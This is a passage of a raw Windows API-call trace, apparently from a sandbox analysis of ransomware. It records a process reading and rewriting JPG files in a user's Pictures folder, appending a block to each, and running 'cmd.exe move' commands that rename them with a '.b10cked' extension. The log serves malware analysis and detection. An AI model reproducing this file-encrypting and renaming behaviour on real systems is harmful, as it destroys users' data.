cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0143.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="isdKb.jpg", cchWideChar=9, lpMultiByteStr=0x131326c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isdKb.jpg", lpUsedDefaultChar=0x0) returned 9 [0143.299] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x138a8 [0143.299] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0143.299] CloseHandle (hObject=0x114) returned 1 [0143.300] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg") returned 0x23 [0143.300] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\") returned 0x1a [0143.301] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg\" \"C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg\" \"C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x6f0, dwThreadId=0x8b8)) returned 1 [0143.313] CloseHandle (hObject=0x110) returned 1 [0143.313] CloseHandle (hObject=0x114) returned 1 [0143.313] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\") returned 0x1a [0143.313] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\") returned 0x1a [0143.313] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\PICTURES\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\PICTURES\\", cchCount2=26) returned 2 [0143.313] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.313] ReleaseMutex (hMutex=0xf8) returned 1 [0143.313] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 
[0143.313] ReleaseMutex (hMutex=0xf8) returned 1 [0143.313] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.313] ReleaseMutex (hMutex=0xf8) returned 1 [0143.313] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.313] ReleaseMutex (hMutex=0xf8) returned 1 [0143.313] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\kywwkrklabluzyrj9.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d5e [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.314] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20010296358) returned 1 [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d5e [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.314] SetFilePointer (in: hFile=0x114, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d5e [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3d5e [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d5e [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d5e [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.314] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d5e [0143.315] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.315] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.315] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d5e [0143.315] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.315] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.315] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d5e [0143.315] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.315] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.315] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d5e [0143.315] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.315] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3876 [0143.315] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0143.316] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0143.316] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0143.316] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3d5e [0143.316] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0143.316] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0143.316] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0143.316] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3d5e [0143.316] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0143.316] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0143.316] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1eae, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1eae, 
lpOverlapped=0x0) returned 1 [0143.316] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0143.316] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1eae, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1eae, lpOverlapped=0x0) returned 1 [0143.317] SetFilePointer (in: hFile=0x114, lDistanceToMove=-7854, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1eb0 [0143.317] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1eae, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1eae, lpOverlapped=0x0) returned 1 [0143.317] SetFilePointer (in: hFile=0x114, lDistanceToMove=-7854, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1eb0 [0143.317] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1eae, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1eae, lpOverlapped=0x0) returned 1 [0143.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kYWWkRklabLUzyrJ9.jpg", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0143.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kYWWkRklabLUzyrJ9.jpg", cchWideChar=21, lpMultiByteStr=0x13286f4, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kYWWkRklabLUzyrJ9.jpg", lpUsedDefaultChar=0x0) returned 21 [0143.321] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3d5e [0143.321] WriteFile (in: 
hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0143.321] CloseHandle (hObject=0x114) returned 1 [0143.322] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\KYWWKR~1.JPG") returned 0x26 [0143.322] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\") returned 0x1a [0143.322] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\KYWWKR~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\KYWWKR~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x140, dwThreadId=0x8c4)) returned 1 [0143.324] CloseHandle (hObject=0x110) returned 1 [0143.324] CloseHandle (hObject=0x114) returned 1 [0143.324] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\") returned 0x1a [0143.324] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\", cchLength=0x1a | out: 
lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\") returned 0x1a [0143.324] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\PICTURES\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\PICTURES\\", cchCount2=26) returned 2 [0143.324] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.324] ReleaseMutex (hMutex=0xf8) returned 1 [0143.324] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.324] ReleaseMutex (hMutex=0xf8) returned 1 [0143.324] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.324] ReleaseMutex (hMutex=0xf8) returned 1 [0143.324] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.324] ReleaseMutex (hMutex=0xf8) returned 1 [0143.324] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\lr0aR2rEWELj\\j4m1cX oc5jpl3U0YC\\EEJhG5emgLWHUyVz.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2rewelj\\j4m1cx oc5jpl3u0yc\\eejhg5emglwhuyvz.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcf15 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.325] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20011390595) returned 1 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.325] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcf15 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcf15 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xcf15 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcf15 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 
[0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcf15 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcf15 [0143.325] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.326] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.326] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcf15 [0143.326] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.326] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.326] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcf15 [0143.326] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.326] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.326] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xcf15 [0143.326] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.326] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xca2d [0143.326] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0143.327] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0143.327] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0143.327] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xcf15 [0143.327] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0143.327] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0143.327] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0143.327] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xcf15 [0143.327] SetFilePointer (in: 
